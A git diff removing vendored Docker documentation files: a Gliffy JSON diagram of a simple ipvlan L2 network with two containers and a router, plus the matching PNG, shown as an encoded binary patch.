a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy deleted file mode 100644 index 41b0475dfa..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 192.168.1.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router

192.168.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2

192.168.1.3/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

pub_net (eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

docker network create -d ipvlan \\

    --subnet=192.168.1.0/24 \\

    --gateway=192.168.1.1 \\

    -o parent=eth0 pub_net

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png deleted file mode 100644 index e489a446ddd255ce9360445f0f895acad31ae214..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20145 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 